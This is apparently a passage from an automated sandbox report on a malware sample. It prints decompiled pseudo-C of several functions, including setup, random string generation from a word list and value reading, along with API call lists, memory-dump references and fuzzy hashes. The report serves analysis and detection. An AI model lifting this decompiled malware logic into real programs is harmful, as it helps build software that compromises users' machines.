					 *0xa3d294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xa3d12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00A321DE( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xa3d2e0; // 0x296a5a8
					if( *0xa3d294 > 5) {
						_t8 = _t26 + 0xa3e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xa3e9f9; // 0x44283a44
						_t27 = _t7;
					}
					E00A311F4(_t27, _t27);
					_t31 = E00A33598(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0xa3d2a8 =  *0xa3d2a8 ^ 0x81bbe65d;
						_t32 = E00A375F6(0x60);
						 *0xa3d364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xa3d364; // 0x33a95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xa3d364; // 0x33a95b0
							 *_t51 = 0xa3e823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xa3d270, 0, 0x43);
							 *0xa3d300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xa3d294; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xa3d2e0; // 0x296a5a8
								_t13 = _t58 + 0xa3e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xa3c2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00A3A82B( ~_v8 &  *0xa3d2a8, 0xa3d00c); // executed
								_t42 = E00A34C40(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00A374A5(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00A35461(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E00A33FC2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xa3d128();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E00A35AB2(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                                                                                                                  0x00a3520d
                                                                                                                                  0x00a35218
                                                                                                                                  0x00a3521b
                                                                                                                                  0x00a3521e
                                                                                                                                  0x00a35221
                                                                                                                                  0x00a35228
                                                                                                                                  0x00a3522a
                                                                                                                                  0x00a35236
                                                                                                                                  0x00a35238
                                                                                                                                  0x00a35238
                                                                                                                                  0x00a35241
                                                                                                                                  0x00a35247
                                                                                                                                  0x00a3524c
                                                                                                                                  0x00a35266
                                                                                                                                  0x00a35272
                                                                                                                                  0x00a35274
                                                                                                                                  0x00a35279
                                                                                                                                  0x00a35283
                                                                                                                                  0x00a35283
                                                                                                                                  0x00a3527b
                                                                                                                                  0x00a3527b
                                                                                                                                  0x00a3527b
                                                                                                                                  0x00a3527b
                                                                                                                                  0x00a3528a
                                                                                                                                  0x00a35297
                                                                                                                                  0x00a3529e
                                                                                                                                  0x00a352a3
                                                                                                                                  0x00a352a3
                                                                                                                                  0x00a352ab
                                                                                                                                  0x00a352ae
                                                                                                                                  0x00a352d4
                                                                                                                                  0x00a352e0
                                                                                                                                  0x00a352e5
                                                                                                                                  0x00a352ea
                                                                                                                                  0x00a352ec
                                                                                                                                  0x00a35318
                                                                                                                                  0x00a3531a
                                                                                                                                  0x00a352ee
                                                                                                                                  0x00a352f2
                                                                                                                                  0x00a352f7
                                                                                                                                  0x00a352fc
                                                                                                                                  0x00a35303
                                                                                                                                  0x00a35309
                                                                                                                                  0x00a3530e
                                                                                                                                  0x00a35314
                                                                                                                                  0x00a3531b
                                                                                                                                  0x00a3531d
                                                                                                                                  0x00a3531f
                                                                                                                                  0x00a3532e
                                                                                                                                  0x00a35334
                                                                                                                                  0x00a35339
                                                                                                                                  0x00a3533b
                                                                                                                                  0x00a3536b
                                                                                                                                  0x00a3536d
                                                                                                                                  0x00a3533d
                                                                                                                                  0x00a3533d
                                                                                                                                  0x00a35343
                                                                                                                                  0x00a35350
                                                                                                                                  0x00a35356
                                                                                                                                  0x00a35356
                                                                                                                                  0x00a3535e
                                                                                                                                  0x00a35367
                                                                                                                                  0x00a3536e
                                                                                                                                  0x00a35370
                                                                                                                                  0x00a35372
                                                                                                                                  0x00a35379
                                                                                                                                  0x00a35386
                                                                                                                                  0x00a3538b
                                                                                                                                  0x00a35390
                                                                                                                                  0x00a35392
                                                                                                                                  0x00a35394
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a35396
                                                                                                                                  0x00a3539b
                                                                                                                                  0x00a3539d
                                                                                                                                  0x00a353a4
                                                                                                                                  0x00a353a8
                                                                                                                                  0x00a353ab
                                                                                                                                  0x00a353c0
                                                                                                                                  0x00a353c4
                                                                                                                                  0x00a353c9
                                                                                                                                  0x00000000
                                                                                                                                  0x00a353c9
                                                                                                                                  0x00a353ad
                                                                                                                                  0x00a353af
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a353ba
                                                                                                                                  0x00a353bc
                                                                                                                                  0x00a353be
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a353be
                                                                                                                                  0x00a353a1
                                                                                                                                  0x00a353a1
                                                                                                                                  0x00a35372
                                                                                                                                  0x00a352b0
                                                                                                                                  0x00a352b0
                                                                                                                                  0x00a352b5
                                                                                                                                  0x00a353cb
                                                                                                                                  0x00a353cf
                                                                                                                                  0x00a353d7
                                                                                                                                  0x00a353d7
                                                                                                                                  0x00000000
                                                                                                                                  0x00a353cf
                                                                                                                                  0x00a352bb
                                                                                                                                  0x00a352be
                                                                                                                                  0x00a352c8
                                                                                                                                  0x00a352cf
                                                                                                                                  0x00000000
                                                                                                                                  0x00a353df
                                                                                                                                  0x00a353df
                                                                                                                                  0x00a353e3
                                                                                                                                  0x00a353e7
                                                                                                                                  0x00a353e7

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A3154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,00A35226,00000000,00000000), ref: 00A31559
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00A352A3
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • memset.NTDLL ref: 00A352F2
                                                                                                                                  • RtlInitializeCriticalSection.NTDLL(033A9570), ref: 00A35303
                                                                                                                                    • Part of subcall function 00A33FC2: memset.NTDLL ref: 00A33FD7
                                                                                                                                    • Part of subcall function 00A33FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00A34019
                                                                                                                                    • Part of subcall function 00A33FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 00A34024
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00A3532E
                                                                                                                                  • wsprintfA.USER32 ref: 00A3535E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4246211962-0
                                                                                                                                  • Opcode ID: 13b122590d131c8a36696576b6d9d2489459ce2a1a6340eda808f5a275089418
                                                                                                                                  • Instruction ID: c86ba67e3ad50cf91d054aba6187e6f415777ea7697ed486b9e3dc3287e83842
                                                                                                                                  • Opcode Fuzzy Hash: 13b122590d131c8a36696576b6d9d2489459ce2a1a6340eda808f5a275089418
                                                                                                                                  • Instruction Fuzzy Hash: 2451D171E40B14EFDB20EBF8EDA9BAF73B8AB04750F140425F502EB151E7B099458B90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A378E6, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 22%
                                                                                                                                  			E00A378E6(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00A375F6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00A34AAB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E00A375F6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xa3d2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                                                                                                  0x00a378ed
                                                                                                                                  0x00a378f4
                                                                                                                                  0x00a378f9
                                                                                                                                  0x00a378fc
                                                                                                                                  0x00a37903
                                                                                                                                  0x00a37906
                                                                                                                                  0x00a37909
                                                                                                                                  0x00a3790e
                                                                                                                                  0x00a37913
                                                                                                                                  0x00a37a67
                                                                                                                                  0x00a37a69
                                                                                                                                  0x00a37a6b
                                                                                                                                  0x00a37a70
                                                                                                                                  0x00a37a70
                                                                                                                                  0x00a37919
                                                                                                                                  0x00a3791c
                                                                                                                                  0x00a3791f
                                                                                                                                  0x00a37921
                                                                                                                                  0x00a37921
                                                                                                                                  0x00a37925
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37929
                                                                                                                                  0x00a37955
                                                                                                                                  0x00a3795a
                                                                                                                                  0x00a3795c
                                                                                                                                  0x00a3795c
                                                                                                                                  0x00a3795f
                                                                                                                                  0x00a37962
                                                                                                                                  0x00a37962
                                                                                                                                  0x00a37964
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3792f
                                                                                                                                  0x00a37931
                                                                                                                                  0x00a37950
                                                                                                                                  0x00a37950
                                                                                                                                  0x00a37967
                                                                                                                                  0x00a37967
                                                                                                                                  0x00a37968
                                                                                                                                  0x00a37968
                                                                                                                                  0x00a3796b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3796b
                                                                                                                                  0x00a37935
                                                                                                                                  0x00a3797c
                                                                                                                                  0x00a37980
                                                                                                                                  0x00a37a5a
                                                                                                                                  0x00a37a5c
                                                                                                                                  0x00a37a5c
                                                                                                                                  0x00a37a5d
                                                                                                                                  0x00a37a60
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37a60
                                                                                                                                  0x00a37989
                                                                                                                                  0x00a3799a
                                                                                                                                  0x00a3799e
                                                                                                                                  0x00a37a56
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37a56
                                                                                                                                  0x00a379a4
                                                                                                                                  0x00a379a7
                                                                                                                                  0x00a379ab
                                                                                                                                  0x00a379af
                                                                                                                                  0x00a379b4
                                                                                                                                  0x00a37a4c
                                                                                                                                  0x00a37a4c
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37a52
                                                                                                                                  0x00a379bf
                                                                                                                                  0x00a379c8
                                                                                                                                  0x00a379dc
                                                                                                                                  0x00a379e3
                                                                                                                                  0x00a379f8
                                                                                                                                  0x00a379fe
                                                                                                                                  0x00a37a06
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37a08
                                                                                                                                  0x00a37a08
                                                                                                                                  0x00a37a08
                                                                                                                                  0x00a37a0f
                                                                                                                                  0x00a37a17
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37a19
                                                                                                                                  0x00a37a22
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37a24
                                                                                                                                  0x00a37a26
                                                                                                                                  0x00a37a29
                                                                                                                                  0x00a37a29
                                                                                                                                  0x00a37a2c
                                                                                                                                  0x00a37a30
                                                                                                                                  0x00a37a33
                                                                                                                                  0x00a37a39
                                                                                                                                  0x00a37a3c
                                                                                                                                  0x00a37a43
                                                                                                                                  0x00000000
                                                                                                                                  0x00a379bf
                                                                                                                                  0x00a3793a
                                                                                                                                  0x00a37942
                                                                                                                                  0x00a37948
                                                                                                                                  0x00a3794a
                                                                                                                                  0x00a3794a
                                                                                                                                  0x00a3794d
                                                                                                                                  0x00a3794f
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3794f
                                                                                                                                  0x00a37929
                                                                                                                                  0x00a3796f
                                                                                                                                  0x00a37974
                                                                                                                                  0x00a37976
                                                                                                                                  0x00a37976
                                                                                                                                  0x00a37979
                                                                                                                                  0x00a37979
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00A379E3
                                                                                                                                  • lstrcat.KERNEL32(69B25F45,00000020), ref: 00A379F8
                                                                                                                                  • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00A37A0F
                                                                                                                                  • lstrlen.KERNEL32(69B25F45), ref: 00A37A33
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3214092121-3916222277
                                                                                                                                  • Opcode ID: 9e90c592827bb58de47b4becda9b6733a05067e5dcf7b8a58220d381d5c5b54c
                                                                                                                                  • Instruction ID: 828a43a9add1b99210ea30a79c5f5789d8a04475e7c2d2f8d6a2bf4d04c2bedf
                                                                                                                                  • Opcode Fuzzy Hash: 9e90c592827bb58de47b4becda9b6733a05067e5dcf7b8a58220d381d5c5b54c
                                                                                                                                  • Instruction Fuzzy Hash: 6251CEB1A08218EFCF21DF99C984BADBBB6FF45364F14815AF854AB211C730AB01CB40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3121A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 18%
                                                                                                                                  			E00A3121A(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t65;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t63 = __esi + 0x2c;
				_v16 = 0;
				 *_t63 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t63);
				_t64 = __imp__; // 0x6fa7fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t64() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E00A375F6(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t64() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t65 = E00A375F6(_v8 + 1);
							if(_t65 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t65, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t65;
							}
						}
						E00A34AAB(_v20);
					}
					goto L12;
				}
			}












                                                                                                                                  0x00a31220
                                                                                                                                  0x00a31227
                                                                                                                                  0x00a3122a
                                                                                                                                  0x00a3122d
                                                                                                                                  0x00a3122f
                                                                                                                                  0x00a31234
                                                                                                                                  0x00a31317
                                                                                                                                  0x00a3131d
                                                                                                                                  0x00a3131d
                                                                                                                                  0x00a3123e
                                                                                                                                  0x00a31245
                                                                                                                                  0x00a3124d
                                                                                                                                  0x00a3130e
                                                                                                                                  0x00a31314
                                                                                                                                  0x00000000
                                                                                                                                  0x00a31314
                                                                                                                                  0x00a31256
                                                                                                                                  0x00a3125a
                                                                                                                                  0x00a3125b
                                                                                                                                  0x00a3125c
                                                                                                                                  0x00a31262
                                                                                                                                  0x00a31263
                                                                                                                                  0x00a31268
                                                                                                                                  0x00a3126f
                                                                                                                                  0x00000000
                                                                                                                                  0x00a31275
                                                                                                                                  0x00a31284
                                                                                                                                  0x00a31287
                                                                                                                                  0x00a3128a
                                                                                                                                  0x00a31293
                                                                                                                                  0x00a31298
                                                                                                                                  0x00a3129d
                                                                                                                                  0x00a31305
                                                                                                                                  0x00a3129f
                                                                                                                                  0x00a312a2
                                                                                                                                  0x00a312a6
                                                                                                                                  0x00a312a7
                                                                                                                                  0x00a312a8
                                                                                                                                  0x00a312a9
                                                                                                                                  0x00a312ab
                                                                                                                                  0x00a312b2
                                                                                                                                  0x00a312f8
                                                                                                                                  0x00a312b4
                                                                                                                                  0x00a312b4
                                                                                                                                  0x00a312bf
                                                                                                                                  0x00a312cd
                                                                                                                                  0x00a312d1
                                                                                                                                  0x00a312e9
                                                                                                                                  0x00a312d3
                                                                                                                                  0x00a312dc
                                                                                                                                  0x00a312e4
                                                                                                                                  0x00a312e4
                                                                                                                                  0x00a312d1
                                                                                                                                  0x00a312fe
                                                                                                                                  0x00a312fe
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3129d

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A3130E
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • wcstombs.NTDLL ref: 00A312DC
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A312F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2631933831-3251738875
                                                                                                                                  • Opcode ID: a801b8ba59c06fea75d46f237acc1ea87345dec34faa9e4ecdf8df58aaf58cb5
                                                                                                                                  • Instruction ID: 867b6ac9c134480f14353a00f9000e70500a2630d8a14984bbcdda076c236eac
                                                                                                                                  • Opcode Fuzzy Hash: a801b8ba59c06fea75d46f237acc1ea87345dec34faa9e4ecdf8df58aaf58cb5
                                                                                                                                  • Instruction Fuzzy Hash: 3F31E5B6900209EFDB20DFE5CD84EAEB7B8FF48344F10456AF542E7651DA30AE459B60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3502E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3502E(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00A337AC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xa3d2e0; // 0x296a5a8
				_t4 = _t24 + 0xa3edc8; // 0x33a9370
				_t5 = _t24 + 0xa3ed70; // 0x4f0053
				_t26 = E00A34B28( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xa3d2e0; // 0x296a5a8
						_t11 = _t32 + 0xa3edbc; // 0x33a9364
						_t48 = _t11;
						_t12 = _t32 + 0xa3ed70; // 0x4f0053
						_t52 = E00A3131E(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xa3d2e0; // 0x296a5a8
							_t13 = _t35 + 0xa3ee06; // 0x30314549
							if(E00A3117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0xa3d294 - 6;
								if( *0xa3d294 <= 6) {
									_t42 =  *0xa3d2e0; // 0x296a5a8
									_t15 = _t42 + 0xa3ec12; // 0x52384549
									E00A3117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xa3d2e0; // 0x296a5a8
							_t17 = _t38 + 0xa3ee00; // 0x33a93a8
							_t18 = _t38 + 0xa3edd8; // 0x680043
							_t45 = E00A35DDA(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0xa3d270, 0, _t52);
						}
					}
					HeapFree( *0xa3d270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00A351BB(_t54);
				}
				return _t45;
			}


















                                                                                                                                  0x00a3502e
                                                                                                                                  0x00a3503e
                                                                                                                                  0x00a35041
                                                                                                                                  0x00a35048
                                                                                                                                  0x00a3504a
                                                                                                                                  0x00a3504a
                                                                                                                                  0x00a3504d
                                                                                                                                  0x00a35052
                                                                                                                                  0x00a35059
                                                                                                                                  0x00a35066
                                                                                                                                  0x00a3506b
                                                                                                                                  0x00a3506f
                                                                                                                                  0x00a3507d
                                                                                                                                  0x00a3508b
                                                                                                                                  0x00a3508f
                                                                                                                                  0x00a35120
                                                                                                                                  0x00a35120
                                                                                                                                  0x00a35095
                                                                                                                                  0x00a35095
                                                                                                                                  0x00a3509a
                                                                                                                                  0x00a3509a
                                                                                                                                  0x00a350a1
                                                                                                                                  0x00a350ad
                                                                                                                                  0x00a350af
                                                                                                                                  0x00a350b1
                                                                                                                                  0x00a350b3
                                                                                                                                  0x00a350ba
                                                                                                                                  0x00a350cc
                                                                                                                                  0x00a350ce
                                                                                                                                  0x00a350d5
                                                                                                                                  0x00a350d7
                                                                                                                                  0x00a350de
                                                                                                                                  0x00a350e9
                                                                                                                                  0x00a350e9
                                                                                                                                  0x00a350d5
                                                                                                                                  0x00a350ee
                                                                                                                                  0x00a350f3
                                                                                                                                  0x00a350fa
                                                                                                                                  0x00a35118
                                                                                                                                  0x00a3511a
                                                                                                                                  0x00a3511a
                                                                                                                                  0x00a350b1
                                                                                                                                  0x00a3512c
                                                                                                                                  0x00a3512c
                                                                                                                                  0x00a3512e
                                                                                                                                  0x00a35133
                                                                                                                                  0x00a35135
                                                                                                                                  0x00a35135
                                                                                                                                  0x00a35140

                                                                                                                                  APIs
                                                                                                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,033A9370,00000000,?,74E5F710,00000000,74E5F730), ref: 00A3507D
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,033A93A8,?,00000000,30314549,00000014,004F0053,033A9364), ref: 00A3511A
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A354EF), ref: 00A3512C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3298025750-8415677
                                                                                                                                  • Opcode ID: 1f89f3686314aa152bf5b77bf1307f734f7fde80dc50adea647d419a5aca5f0d
                                                                                                                                  • Instruction ID: b4416f8db7e3ba56ef6a88a5df39afc0a79706e906bb2c6a901b32ec91954ee0
                                                                                                                                  • Opcode Fuzzy Hash: 1f89f3686314aa152bf5b77bf1307f734f7fde80dc50adea647d419a5aca5f0d
                                                                                                                                  • Instruction Fuzzy Hash: 88317172A00508FFEB21EBE8ED85EEA7BBCEB04740F1501A9F500A7161D771AE16DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

